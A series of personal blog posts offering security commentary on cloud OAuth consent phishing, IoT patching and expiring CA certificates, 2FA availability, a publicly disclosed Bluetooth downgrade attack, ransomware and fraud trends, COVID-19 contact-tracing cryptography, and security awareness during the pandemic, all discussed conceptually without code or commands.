Phishing in the Clouds

Again on Phishing, this time with a new twist.

We all know and by now use complex SaaS Cloud services, like Microsoft’s Office 365, Google’s G Suite, Amazon services and so on. They are all very modular, meaning that there are multiple data storage services and multiple application services from which to choose and use. Often a user must authorise a Cloud App to access her/his own data, and the App can be also by an external provider (a “partner” of the service). The Authorisation is usually implemented with OAuth which, in a few words, is a secure delegation access protocol based on the exchange of cryptographic keys.

So what is the scam? Simple: you receive an email which looks like coming from [name your Cloud provider here] and asks you to authorise an App (which looks authentic) to access your data. You do not need to insert any password since you are already logged-in your Cloud service platform, but just to click on the button, and that’s it!

You have given access to all your Cloud data and services to a fraudster, who can get your data and act as you!

For more details read for example this article by ArsTechnica.

Always about Security Patching and Updates

These days I keep coming back to the “security patching and updates” issue. So I am going to add another couple of comments.

The first is about Ripple 20 (here the official link but the news is already wide spread) which carries an impressive number of “CVSS v3 base score 10.0” vulnerabilities. The question is again:

how can we secure all of these Million/Billion vulnerable devices since it seems very likely that security patching is not an option for most of them?

The second one is very hypothetical, that is in the “food for thought” class.

Assume, as some says, that in 2030 Quantum Computers will be powerful enough to break RSA and other asymmetrical cryptographic algorithms, and that at the same time (or just before) Post Quantum Cryptography will deliver us new secure algorithms to substitute RSA and friends. At first sight all looks ok: we will have just to do a lot of security patching/updating of servers, clients, applications, CA certificates, credit cards (hardware), telephone SIMs (hardware), security keys (hardware), Hardware Security Modules (HSM) and so on and on… But what about all those micro/embedded/IoT devices in which the current cryptographic algorithms are baked into? And all of those large devices (like aircrafts but also cars) which have been designed with cryptographic algorithms baked into them (no change possible)? We will probably have to choose between living dangerously or buy a new one. Or we could be forced to buy a new one, if the device will not be able to work anymore since its old algorithm will not be accepted by the rest of the world.

PS. Concerning Quantum Computers,  as far as I know nobody claims that a full Quantum Computer will be functioning by 2030, this is only the earliest possible estimate of arrival, but it could take much much longer, or even never!

PS. I deliberately do not want to consider the scenario in which full Quantum Computers are available and Post Quantum Cryptography is not.

Patching, Updating (again) and CA certificates

Well, it is not the first time I write a comment about the need of security patching and updating all software, or the problem of not doing so. This is even more problematic for IoT and embedded software.

I just read this article on The Register which describes a real trouble which starts to show itself. In a few words, it is approximately 20 years that we massively use CA certificates to establish encrypted (SSL/TLS) connections. Clients software authenticates servers by trusting server certificates signed by a list of known Certification Authorities. Each client software has installed, usually in libraries, the public root certificates of the CA.

Now what happens if the root certificate of a CA expires?

This is not a problem for servers, their certificates are renewed periodically and more recent server certificates are signed by the new root CA.

Clients have some time, typically a few years, to acquire the new CA root certificates, this because root certificates last many years, usually 20. But what if  IoT or embedded devices never get an update? Think about cameras, smart-televisions, refrigerators, light bulbs and any other kind of gadget which connects to an Internet service. As the old root CA certificate expires, they cannot connect to the server and they can just stop working. The only possible way out is to manually update the software, if a software update is available and if an update procedure is possible. Otherwise, it remains only to buy a new device!

Security and Cryptography do not always go Hand in Hand with Availability

I have been reading this article by Ars Technica on smartphones’ 2FA Authenticator Apps and put it together with some thoughts about Hardware Security Keys (implementing the U2F [CTAP1] standard by the FIDO Alliance). In both scenarios, the security of the Second Factor Authentication (2FA) is based on the confidentiality of a cryptographic private key in the first case hold securely in the smartphone and in the second case in the USB hardware key. In other words, the private key cannot be read, copied or transferred to any other device, as it is also for any smart card (or integrated circuit card, ICC) or any Hardware Security Module (HSM).

Good for Security, but what about Availability?

Consider this very simple (and secure) scenario: my smartphone with a 2FA Authenticator App (or alternatively my U2F USB key) utterly breaks down: I have no way, at least given usual economical and time constraints, to recover it.

Now what about access to all those services which I set up in a very secure way with 2FA?

There is no access and no way immediately available to recover it! (But see below for more complete scenarios.)

The only possibility is to get a new hardware and perform a usually manual and lengthy process to regain access to each account and to configure the new hardware 2FA.

So Availability is lost and it could take quite some time and efforts to regain it.

The article by Ars Technica mentioned above, describes how some 2FA Authenticator Apps provide a solution to this problem: the idea is to install the App on multiple devices and securely copy the secret private key on each one of them. But now the secret private key, even if encrypted itself, is not anymore “hardware protected” since it is possible to copy it and transfer it. So Security/Confidentiality goes down but Availability goes up.

This process is obviously impossible as such with U2F hardware keys. In this case an alternative is to have multiple U2F hardware keys registered with all accounts and services so that if one key breaks one can always use a backup key to access the accounts and services. (For more info, see for example this support page by Google.)

On the Latest Bluetooth Impersonation Attack

Details on a new attack on Bluetooth have just been released (see here for its website). From what I understand it is based on two weaknesses of the protocol itself.

A quick description seems to be the following (correct me if I have misunderstood something).

When two Bluetooth devices (Alice and Bob) pair, they establish a common secret key mutually authenticating each other. The secret common key is kept by both Alice and Bob to authenticate each other in all future connections. Up to here all is ok.

Now it is important to notice the following points when Alice and Bob establish a new connection after pairing:

  • the connection can be established using a “Legacy Secure Connection” (LSC, less secure) or a “Secure Connection” (SC, secure), and either Alice or Bob can request to use LSC;
  • one of the devices acts as Master and the other as Slave, a connection can be closed and restarted and either Alice or Bob can request to act as Master;
  • in a “Legacy Secure Connection” the Slave must prove to the Master that it has the common secret key, but it is not requested that the Master proves to the Slave that it also has the common secret key (Authentication weakness);
  • in a “Secure Connection” either Alice or Bob can close the connection and restart it as a “Legacy Secure Connection” (Downgrade weakness).

Now Charlie wants to intercept the Bluetooth connection between Alice and Bob: first he listens to their connection and learns their Bluetooth addresses (which are public). Then Charlie jams the connection between Alice and Bob and connects as a Master to Alice using LSC and Bob’s Bluetooth address, and connects as a Master to Bob using LSC and Alice’s Bluetooth address. Since Charlie is Master both with respect to Alice and to Bob and since he can always downgrade the connection to LSC, he does not have to prove to neither Alice or Bob that he knows their common secret key. In this way Charlie is able to perform a MitM attack on the Bluetooth connection between Alice and Bob (obviously this description is very high level, I sketched just an idea of what is going on).

The bad point about this is that it is a weakness of the protocol, so all existing Bluetooth implementations are subject to it. The good point is that the fix should not be too difficult, except for the fact that many (too many) devices cannot be patched! Fortunately this attack seems not to apply to Bluetooth LE, but still I expect that most Bluetooth devices subject to this attack will never be patched.

But we should also consider the real impact of this attack: to perform it, the attacker Charlie should be physically near enough to the two devices (Alice and Bob) with a dedicate hardware (even if not so expensive), so this limits the possible implementations. Moreover this attack can have important consequences if Bluetooth is used to transfer very sensitive information or for critical applications (for example in the health sector). In other words, I would not worry when using Bluetooth to listen to music from my smartphone but I would worry if Bluetooth is used in some mission critical applications.

Whats’s happening in Cyber/IT Security?

Comparing current reported cyber/IT security threats, attacks and incidents to what happened a few years ago, it seems to me that  something has surely changed (I must warn that these conclusions are not based on statistics but on reading everyday bulletins and news).

On one side, security surely has improved: vulnerabilities are reported and fixed, patches are applied (at least more often), security policies, standards and practices are making a difference. Still managing password and properly configuring systems and services exposed on Internet remain very difficult tasks too often performed without the required depth.

But security has improved, which also means that attackers have been moving to easier and more lucrative approaches which have to do mostly with the “human interface”. In other words: fraud.

The first example is ransomware, that is the attacker is able to access the victim system, copy vast amount of data, then encrypt it or remove it and finally ask a ransom not only to return the data but also to avoid making it public on Internet. Since everybody is getting better in making backups, here the important point is the “making it public on Internet” so that the ransom is asked more to prevent sensitive data to be published than to restore the systems.

The second example is Targeted Phishing attacks, Business Email Compromise and similar scams in which the attacker impersonate a well known or important person by writing emails, letters, making phone calls etc. to convince typically a clerk but in some cases also a manager, to send a large amount of money to the wrong bank account.

Neither of these two types of attacks is new, but now they are filling the news daily. Even if cyber/IT security can still improve tremendously, there have been and there are notable security improvements which makes it that attacks are aimed more often to the weakest link: the human user.

Information, Science, Common Sense and Fake News

These days we drown in COVID-19 news, some reliable, some less, some … unclear.

One striking point is the difficulty of communicating scientific facts, whenever they are available, and how they get twisted, misinterpreted and even manipulated by almost everyone: from top leaders, politicians, journalists, communicators, “evangelists”, scientists down and down to even (hopefully not too much) myself.

Having a scientific background, I have been struggling to make sense of the numbers we can read on the news or social media, hear in television or on internet streaming. A few times I tried to make sense of it scientifically, always ending up in “not enough data” or “source and meaning of data unclear”. Numbers do not lie, but only if you know what they mean.

I tried to make sense of the information submerging us using “common sense” (whatever that means) and understanding even less. Actually I realised that “common sense” often leads us closer to give more credibility to Fake News than to authentic information.

This made me think back to the time when I was at the university doing physics. It is well known that in the scientific research world there are at least two major kinds of communicating issues:

  1. communicating with fellow researchers
  2. communicating with the public

and the second is a much bigger issue than the first.

Communication among fellow researchers has to be extremely clear and detailed, all data must be presented and clearly defined otherwise misunderstanding and misinterpretations are the inevitable consequence.  It is possible that a great number of different “opinions” of the experts we hear every day, are indeed based on this type of incomplete communication.

But these days this gets worse since these “opinions” are rushed to the public who understands something else entirely by using common sense and not the appropriate scientific approach. Of this I had personal experiences when I was asked by friends to explain some concepts of elementary particle physics: describing these concepts by means of analogies and not well defined ideas, often led my friends to conclusions which had nothing to do with physics, were wrong or plainly absurd. Obviously it was not my friends’ fault but mine: all of us interpret the information we receive with the logical tools we have, even if none is really appropriate.

So where does this bring us concerning COVID-19? Scientific information should be clearly and precisely presented to the public and in particular to our leaders and politicians, in a form in which data can be logically understood by the recipient. This is difficult but particularly important for information presented to the public by the news and by all information channels in times of crisis such as the one we are experiencing right now. Otherwise misunderstanding, misinterpretation and manipulation of information become too easy and common. Unfortunately recently this seems to have happened too often.

Cryptography for a COVID-19 Contact Tracing App by Apple and Google

Apple and Google (in alphabetic order) have released a draft of a cryptographic protocol named Contact Tracing (here the specification) for a new Privacy-preserving Bluetooth protocol to support COVID-19 Contact Tracing. As far as I understand (please correct me if I have misunderstood something), it should work as follows:

  • Bluetooth LE is extended on the devices with this new procotol
  • A service provider distributes an App which makes use of the protocol and communicates with a server managed by the service provider or a third party
  • Users install the App on their devices and keep Bluetooth on
  • When two devices with the App installed are nearby, they exchange some locally generated cryptographic key material called Rolling Proximity Identifier: these identifiers are privacy preserving, that is from the identifier alone it is not possible to identify the device which originated it; all Rolling Proximity Identifiers are stored only locally on the devices themselves (both originator and receiver)
  • When a user tests positive to COVID-19, she or he inserts this information in the App which then generates a set of cryptographic key material called Diagnosis Keys corresponding to the days in which the users could have been already infected; the App then sends the Diagnosis Keys to the server which distributes them to all other devices on which the App is running
  • When an App receives from the server some Diagnosis Keys, it is able to compute a set of Rolling Proximity Identifiers and to check if at least one is present in the local storage; if there is a match, the information derived is that on a certain day, in a 10 minutes time interval, the user of the App has been in proximity with a person who later tested positive to COVID-19.

Obviously a Privacy pre-requisite to all this is that neither server nor App manage or store any other information or metadata about the users and the devices on which the App runs.

Perception of IT Security in Times of Crisis

What does happen to IT Security in times of crisis? The change of behaviour and rush to provide new services can be detrimental to IT Security. We are witnessing it these days. From a broad perspective, there are at least two major sides to it: IT service providers and (new) users.

In case of an crisis like COVID-19 which we are just now experiencing, IT service providers are requested to provide new services in extremely short time and to improve the already existing ones. But in IT, rush does not usually go well with security. Take as an example what has just happened in Italy: the government has charged the state pension fund (INPS) to provide subsidies for COVID-19 to no less than 5 million people (INPS usually provides pension to more than 16 million people in Italy). Obviously due to the full lock-down of the country, the procedure has to be done online. So the new IT services to request and manage the subsidies went online, and according to the news, an epic IT security failure followed: availability and in part integrity and confidentiality were violated.

Is it possible to manage in IT at the same time extremely tight and aggressive schedules and security? I believe so, but only if security is embedded in everything we do in IT.

But I believe that IT security, at least for the IT as it is nowdays, requires also the users to be aware of it and to behave accordingly. Due to COVID-19, we have all been required or strongly adviced to move many activities to online services, from work to school, shopping etc. But the physical world has very different characteristic from the virtual Internet world.

For example, consider the case of a small local pro-bono association whose members used to meet in person periodically: access to the room is free, and there is freedom of speech and contribution to the association. Now think about moving these meetings to an audio/video conference in Internet, publicly announced, with free entrance and free access for all participants to audio, video, chat etc.: is this the same thing?

Definitely not.

The rules and behaviours which apply to a physical meeting, announced with paper leaflets distributed on the streets, of a small group of people in a physical room, surely do not apply to an audio/video/chat conference in Internet. What can happen if you do? Instead of the usual 20 participants, hundreds or thousands of people could show up and some could abuse the free access to audio/video/chat etc. to whichever purpose, including drugs, malware, pornography etc.

Is this a failure of the IT technology, of the service provider or of the lack of security awareness of the (new) user?

How long will it take to humanity to really comprehend the difference between the physical and the virtual world?